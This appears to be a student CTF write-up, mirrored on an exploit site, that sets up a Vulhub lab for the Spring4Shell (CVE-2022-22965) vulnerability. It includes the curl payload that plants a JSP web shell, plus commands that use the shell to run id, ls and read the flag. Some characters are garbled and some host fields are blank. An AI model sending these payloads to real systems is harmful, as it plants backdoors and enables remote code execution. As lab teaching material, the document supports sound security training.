## https://sploitus.com/exploit?id=E5C51EF4-53A6-5EBC-B9C0-9FFB53D2F6F2
# Spring4Shell (CVE-2022-22965) Vulnerability Environment Setup and CTF Problem
## Project Overview
This project creates a Spring4Shell (CVE-2022-22965) vulnerability environment using Vulhub, and designs a CTF problem where participants can read flags through remote code execution vulnerabilities. ---
## Environment Setup Steps
### 1. Install Docker and Docker Compose
```bash
# Update the package repository
sudo apt update
# Install Docker and Docker Compose
sudo apt install docker.io docker-compose -y
# Start the Docker service
sudo systemctl start docker
sudo systemctl enable docker
```
### 2. Download the Vulhub vulnerability environment
```bash
# Download the Vulhub project
git clone https://github.com/vulhub/vulhub.git
# Navigate to the Spring4Shell vulnerability directory
cd vulhub/spring/CVE-2022-22965
```
### 3. Start the vulnerability environment
```bash
# Start the Docker container
sudo docker-compose up -d
# Verify that the container is running
sudo docker ps
```

### 4. Verify the environment
Open a browser and visit `http://localhost:8080/?name=Hacker&age=99`

---
## Shell.jsp File
After successful attacks, the shell file will be written to `webapps/ROOT/tomcatwar.jsp`, with the following content:
```jsp
```
### How to Use the Backdoor
Execute arbitrary system commands using the `cmd` parameter:
```bash
http://localhost:8080/tomcatwar.jsp?cmd=id
```
---
## RCE Attack Screenshots
### Executing the `id` command
```bash
curl "http://localhost:8080/tomcatwar.jsp?cmd=id"
```

### Executing the `ls /` command
```bash
curl "http://localhost:8080/tomcatwar.jsp?cmd=ls%20/"
```

---
## Description of the CTF Problem
### Problem Name
Spring4Shell Vulnerability Exploitation
### Problem Description
There is a website using the Spring MVC framework, which seems to have a remote code execution vulnerability. Can you find the flag hidden on the server?
### Location of the Flag
```
/tmp/flag.txt
```
### Content of the Flag
```
FLAG{Spring4Shell_Is_Dangerous}
```
---
## Solution Steps
### Step 1: Confirm the existence of the vulnerability
Visit `http://:8080/`
name=test&age=123โ, confirming that the parameter binding function works properly. ### Step 2: Send an Attack Payload
Using the Spring4Shell vulnerability to inject into the JSP backdoor:
```bash
curl -X POST "http://:8080/?" \
-H "suffix: %>//" \
-H "c1: Runtime" \
-H "c2: &class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="
```
### Step 3: Use the backdoor to execute commands
Access the backdoor and execute `id` to confirm successful RCE:
```
http://:8080/tomcatwar.jsp?cmd=id
```
### Step 4: Read the flag
```bash
curl "http://:8080/tomcatwar.jsp?cmd=cat%20/tmp/flag.txt"
```

### Step 5: Obtain the flag
```
FLAG{Spring4Shell_Is_Dangerous}
```
---
## Project Structure
```
Spring4Shell-CTF/
โโโ README.md # Project documentation
โโโ screenshots/ # Screenshot folder
โ โโโ docker-ps.png
โ โโโ parameter-binding.png
โ โโโ rce-id.png
โ โโโ rce-ls.png
โ โโโ flag-result.png
โโโ shell.jsp # Original backdoor code
```
---
## References
- [CVE-2022-22965 Detailed Analysis](https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement)
- [Vulhub Spring4Shell Environment](https://github.com/vulhub/vulhub/tree/master/spring/CVE-2022-22965)
- [Spring4Shell PoC](https://github.com/BobTheShoplifter/Spring4Shell-POC)
---
## Team Members
| Role | Name | Role |
|------|------|------|
| Member A | Huang Yuting | Environment setup, attack implementation, CTF design |
| Member B | Li Zhenlin | Theoretical research, presentation creation, video editing |
---
## Permissions
This project is intended only for educational and research purposes. Please do not use it on unauthorized systems.
[source-iocs-preserved url=http://:8080/?name=test&age=123`๏ผ็ขบ่ชๅๆธ็ถๅฎๅ่ฝๆญฃๅธธใ]